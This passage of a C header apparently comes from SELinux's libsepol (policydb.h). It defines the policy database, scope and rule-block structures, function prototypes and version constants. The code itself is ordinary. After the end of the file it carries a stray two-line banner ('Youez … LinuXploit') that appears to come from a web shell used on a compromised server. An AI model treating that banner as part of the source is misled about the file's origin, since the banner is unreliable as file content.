/* section: module information */

/* scope_index_t holds all of the symbols that are in scope in a
 * particular situation.  The bitmaps are indices (and thus must
 * subtract one) into the global policydb->scope array. */
typedef struct scope_index {
	ebitmap_t scope[SYM_NUM];
#define p_classes_scope scope[SYM_CLASSES]
#define p_roles_scope scope[SYM_ROLES]
#define p_types_scope scope[SYM_TYPES]
#define p_users_scope scope[SYM_USERS]
#define p_bools_scope scope[SYM_BOOLS]
#define p_sens_scope scope[SYM_LEVELS]
#define p_cat_scope scope[SYM_CATS]

	/* this array maps from class->value to the permissions within
	 * scope.  if bit (perm->value - 1) is set in map
	 * class_perms_map[class->value - 1] then that permission is
	 * enabled for this class within this decl.  */
	ebitmap_t *class_perms_map;
	/* total number of classes in class_perms_map array */
	uint32_t class_perms_len;
} scope_index_t;

/* a list of declarations for a particular avrule_decl */

/* These two structs declare a block of policy that has TE and RBAC
 * statements and declarations.  The root block (the global policy)
 * can never have an ELSE branch. */
typedef struct avrule_decl {
	uint32_t decl_id;
	uint32_t enabled;	/* whether this block is enabled */

	cond_list_t *cond_list;
	avrule_t *avrules;
	role_trans_rule_t *role_tr_rules;
	role_allow_rule_t *role_allow_rules;
	range_trans_rule_t *range_tr_rules;
	scope_index_t required;	/* symbols needed to activate this block */
	scope_index_t declared;	/* symbols declared within this block */

	/* type transition rules with a 'name' component */
	filename_trans_rule_t *filename_trans_rules;

	/* for additive statements (type attribute, roles, and users) */
	symtab_t symtab[SYM_NUM];

	/* In a linked module this will contain the name of the module
	 * from which this avrule_decl originated. */
	char *module_name;

	struct avrule_decl *next;
} avrule_decl_t;

typedef struct avrule_block {
	avrule_decl_t *branch_list;
	avrule_decl_t *enabled;	/* pointer to which branch is enabled.  this is
				   used in linking and never written to disk */
#define AVRULE_OPTIONAL 1
	uint32_t flags;		/* any flags for this block, currently just optional */
	struct avrule_block *next;
} avrule_block_t;

/* Every identifier has its own scope datum.  The datum describes if
 * the item is to be included into the final policy during
 * expansion. */
typedef struct scope_datum {
/* Required for this decl */
#define SCOPE_REQ  1
/* Declared in this decl */
#define SCOPE_DECL 2
	uint32_t scope;
	uint32_t *decl_ids;
	uint32_t decl_ids_len;
	/* decl_ids is a list of avrule_decl's that declare/require
	 * this symbol.  If scope==SCOPE_DECL then this is a list of
	 * declarations.  If the symbol may only be declared once
	 * (types, bools) then decl_ids_len will be exactly 1.  For
	 * implicitly declared things (roles, users) then decl_ids_len
	 * will be at least 1. */
} scope_datum_t;

/* The policy database */
typedef struct policydb {
#define POLICY_KERN SEPOL_POLICY_KERN
#define POLICY_BASE SEPOL_POLICY_BASE
#define POLICY_MOD SEPOL_POLICY_MOD
	uint32_t policy_type;
	char *name;
	char *version;
	int  target_platform;

	/* Set when the policydb is modified such that writing is unsupported */
	int unsupported_format;

	/* Whether this policydb is mls, should always be set */
	int mls;

	/* symbol tables */
	symtab_t symtab[SYM_NUM];
#define p_commons symtab[SYM_COMMONS]
#define p_classes symtab[SYM_CLASSES]
#define p_roles symtab[SYM_ROLES]
#define p_types symtab[SYM_TYPES]
#define p_users symtab[SYM_USERS]
#define p_bools symtab[SYM_BOOLS]
#define p_levels symtab[SYM_LEVELS]
#define p_cats symtab[SYM_CATS]

	/* symbol names indexed by (value - 1) */
	char **sym_val_to_name[SYM_NUM];
#define p_common_val_to_name sym_val_to_name[SYM_COMMONS]
#define p_class_val_to_name sym_val_to_name[SYM_CLASSES]
#define p_role_val_to_name sym_val_to_name[SYM_ROLES]
#define p_type_val_to_name sym_val_to_name[SYM_TYPES]
#define p_user_val_to_name sym_val_to_name[SYM_USERS]
#define p_bool_val_to_name sym_val_to_name[SYM_BOOLS]
#define p_sens_val_to_name sym_val_to_name[SYM_LEVELS]
#define p_cat_val_to_name sym_val_to_name[SYM_CATS]

	/* class, role, and user attributes indexed by (value - 1) */
	class_datum_t **class_val_to_struct;
	role_datum_t **role_val_to_struct;
	user_datum_t **user_val_to_struct;
	type_datum_t **type_val_to_struct;

	/* module stuff section -- used in parsing and for modules */

	/* keep track of the scope for every identifier.  these are
	 * hash tables, where the key is the identifier name and value
	 * a scope_datum_t.  as a convenience, one may use the
	 * p_*_macros (cf. struct scope_index_t declaration). */
	symtab_t scope[SYM_NUM];

	/* module rule storage */
	avrule_block_t *global;
	/* avrule_decl index used for link/expand */
	avrule_decl_t **decl_val_to_struct;

	/* compiled storage of rules - use for the kernel policy */

	/* type enforcement access vectors and transitions */
	avtab_t te_avtab;

	/* bools indexed by (value - 1) */
	cond_bool_datum_t **bool_val_to_struct;
	/* type enforcement conditional access vectors and transitions */
	avtab_t te_cond_avtab;
	/* linked list indexing te_cond_avtab by conditional */
	cond_list_t *cond_list;

	/* role transitions */
	role_trans_t *role_tr;

	/* type transition rules with a 'name' component */
	filename_trans_t *filename_trans;

	/* role allows */
	role_allow_t *role_allow;

	/* security contexts of initial SIDs, unlabeled file systems,
	   TCP or UDP port numbers, network interfaces and nodes */
	ocontext_t *ocontexts[OCON_NUM];

	/* security contexts for files in filesystems that cannot support
	   a persistent label mapping or use another 
	   fixed labeling behavior. */
	genfs_t *genfs;

	/* range transitions */
	range_trans_t *range_tr;

	ebitmap_t *type_attr_map;

	ebitmap_t *attr_type_map;	/* not saved in the binary policy */

	ebitmap_t policycaps;

	/* this bitmap is referenced by type NOT the typical type-1 used in other
	   bitmaps.  Someday the 0 bit may be used for global permissive */
	ebitmap_t permissive_map;

	unsigned policyvers;

	unsigned handle_unknown;
} policydb_t;

struct sepol_policydb {
	struct policydb p;
};

extern int policydb_init(policydb_t * p);

extern int policydb_from_image(sepol_handle_t * handle,
			       void *data, size_t len, policydb_t * policydb);

extern int policydb_to_image(sepol_handle_t * handle,
			     policydb_t * policydb, void **newdata,
			     size_t * newlen);

extern int policydb_index_classes(policydb_t * p);

extern int policydb_index_bools(policydb_t * p);

extern int policydb_index_others(sepol_handle_t * handle, policydb_t * p,
				 unsigned int verbose);

extern int policydb_reindex_users(policydb_t * p);

extern void policydb_destroy(policydb_t * p);

extern int policydb_load_isids(policydb_t * p, sidtab_t * s);

/* Deprecated */
extern int policydb_context_isvalid(const policydb_t * p,
				    const context_struct_t * c);

extern void symtabs_destroy(symtab_t * symtab);
extern int scope_destroy(hashtab_key_t key, hashtab_datum_t datum, void *p);
typedef void (*hashtab_destroy_func_t) (hashtab_key_t k, hashtab_datum_t d,
					void *args);
extern hashtab_destroy_func_t get_symtab_destroy_func(int sym_num);

extern void class_perm_node_init(class_perm_node_t * x);
extern void type_set_init(type_set_t * x);
extern void type_set_destroy(type_set_t * x);
extern int type_set_cpy(type_set_t * dst, type_set_t * src);
extern int type_set_or_eq(type_set_t * dst, type_set_t * other);
extern void role_set_init(role_set_t * x);
extern void role_set_destroy(role_set_t * x);
extern void avrule_init(avrule_t * x);
extern void avrule_destroy(avrule_t * x);
extern void avrule_list_destroy(avrule_t * x);
extern void role_trans_rule_init(role_trans_rule_t * x);
extern void role_trans_rule_list_destroy(role_trans_rule_t * x);
extern void filename_trans_rule_init(filename_trans_rule_t * x);
extern void filename_trans_rule_list_destroy(filename_trans_rule_t * x);

extern void role_datum_init(role_datum_t * x);
extern void role_datum_destroy(role_datum_t * x);
extern void role_allow_rule_init(role_allow_rule_t * x);
extern void role_allow_rule_destroy(role_allow_rule_t * x);
extern void role_allow_rule_list_destroy(role_allow_rule_t * x);
extern void range_trans_rule_init(range_trans_rule_t *x);
extern void range_trans_rule_destroy(range_trans_rule_t *x);
extern void range_trans_rule_list_destroy(range_trans_rule_t *x);
extern void type_datum_init(type_datum_t * x);
extern void type_datum_destroy(type_datum_t * x);
extern void user_datum_init(user_datum_t * x);
extern void user_datum_destroy(user_datum_t * x);
extern void level_datum_init(level_datum_t * x);
extern void level_datum_destroy(level_datum_t * x);
extern void cat_datum_init(cat_datum_t * x);
extern void cat_datum_destroy(cat_datum_t * x);
extern int check_assertion(policydb_t *p, avrule_t *avrule);
extern int check_assertions(sepol_handle_t * handle,
			    policydb_t * p, avrule_t * avrules);

extern int symtab_insert(policydb_t * x, uint32_t sym,
			 hashtab_key_t key, hashtab_datum_t datum,
			 uint32_t scope, uint32_t avrule_decl_id,
			 uint32_t * value);

/* A policy "file" may be a memory region referenced by a (data, len) pair
   or a file referenced by a FILE pointer. */
typedef struct policy_file {
#define PF_USE_MEMORY  0
#define PF_USE_STDIO   1
#define PF_LEN         2	/* total up length in len field */
	unsigned type;
	char *data;
	size_t len;
	size_t size;
	FILE *fp;
	struct sepol_handle *handle;
} policy_file_t;

struct sepol_policy_file {
	struct policy_file pf;
};

extern void policy_file_init(policy_file_t * x);

extern int policydb_read(policydb_t * p, struct policy_file *fp,
			 unsigned int verbose);
extern int avrule_read_list(policydb_t * p, avrule_t ** avrules,
			    struct policy_file *fp);

extern int policydb_write(struct policydb *p, struct policy_file *pf);
extern int policydb_set_target_platform(policydb_t *p, int platform);

#define PERM_SYMTAB_SIZE 32

/* Identify specific policy version changes */
#define POLICYDB_VERSION_BASE		15
#define POLICYDB_VERSION_BOOL		16
#define POLICYDB_VERSION_IPV6		17
#define POLICYDB_VERSION_NLCLASS	18
#define POLICYDB_VERSION_VALIDATETRANS	19
#define POLICYDB_VERSION_MLS		19
#define POLICYDB_VERSION_AVTAB		20
#define POLICYDB_VERSION_RANGETRANS	21
#define POLICYDB_VERSION_POLCAP		22
#define POLICYDB_VERSION_PERMISSIVE	23
#define POLICYDB_VERSION_BOUNDARY	24
#define POLICYDB_VERSION_FILENAME_TRANS	25
#define POLICYDB_VERSION_ROLETRANS	26
#define POLICYDB_VERSION_NEW_OBJECT_DEFAULTS	27
#define POLICYDB_VERSION_DEFAULT_TYPE	28
#define POLICYDB_VERSION_CONSTRAINT_NAMES	29
#define POLICYDB_VERSION_XEN_DEVICETREE		30 /* Xen-specific */
#define POLICYDB_VERSION_XPERMS_IOCTL	30 /* Linux-specific */
#define POLICYDB_VERSION_INFINIBAND		31 /* Linux-specific */

/* Range of policy versions we understand*/
#define POLICYDB_VERSION_MIN	POLICYDB_VERSION_BASE
#define POLICYDB_VERSION_MAX	POLICYDB_VERSION_INFINIBAND

/* Module versions and specific changes*/
#define MOD_POLICYDB_VERSION_BASE		4
#define MOD_POLICYDB_VERSION_VALIDATETRANS	5
#define MOD_POLICYDB_VERSION_MLS		5
#define MOD_POLICYDB_VERSION_RANGETRANS 	6
#define MOD_POLICYDB_VERSION_MLS_USERS		6
#define MOD_POLICYDB_VERSION_POLCAP		7
#define MOD_POLICYDB_VERSION_PERMISSIVE		8
#define MOD_POLICYDB_VERSION_BOUNDARY		9
#define MOD_POLICYDB_VERSION_BOUNDARY_ALIAS	10
#define MOD_POLICYDB_VERSION_FILENAME_TRANS	11
#define MOD_POLICYDB_VERSION_ROLETRANS		12
#define MOD_POLICYDB_VERSION_ROLEATTRIB		13
#define MOD_POLICYDB_VERSION_TUNABLE_SEP	14
#define MOD_POLICYDB_VERSION_NEW_OBJECT_DEFAULTS	15
#define MOD_POLICYDB_VERSION_DEFAULT_TYPE	16
#define MOD_POLICYDB_VERSION_CONSTRAINT_NAMES  17
#define MOD_POLICYDB_VERSION_XPERMS_IOCTL  18
#define MOD_POLICYDB_VERSION_INFINIBAND		19

#define MOD_POLICYDB_VERSION_MIN MOD_POLICYDB_VERSION_BASE
#define MOD_POLICYDB_VERSION_MAX MOD_POLICYDB_VERSION_INFINIBAND

#define POLICYDB_CONFIG_MLS    1

/* macros to check policy feature */

/* TODO: add other features here */

#define policydb_has_boundary_feature(p)			\
	(((p)->policy_type == POLICY_KERN			\
	  && p->policyvers >= POLICYDB_VERSION_BOUNDARY) ||	\
	 ((p)->policy_type != POLICY_KERN			\
	  && p->policyvers >= MOD_POLICYDB_VERSION_BOUNDARY))

/* the config flags related to unknown classes/perms are bits 2 and 3 */
#define DENY_UNKNOWN	SEPOL_DENY_UNKNOWN
#define REJECT_UNKNOWN	SEPOL_REJECT_UNKNOWN
#define ALLOW_UNKNOWN 	SEPOL_ALLOW_UNKNOWN

#define POLICYDB_CONFIG_UNKNOWN_MASK	(DENY_UNKNOWN | REJECT_UNKNOWN | ALLOW_UNKNOWN)

#define OBJECT_R "object_r"
#define OBJECT_R_VAL 1

#define POLICYDB_MAGIC SELINUX_MAGIC
#define POLICYDB_STRING "SE Linux"
#define POLICYDB_XEN_STRING "XenFlask"
#define POLICYDB_STRING_MAX_LENGTH 32
#define POLICYDB_MOD_MAGIC SELINUX_MOD_MAGIC
#define POLICYDB_MOD_STRING "SE Linux Module"

__END_DECLS
#endif				/* _POLICYDB_H_ */

/* FLASK */

Youez - 2016 - github.com/yon3zu
LinuXploit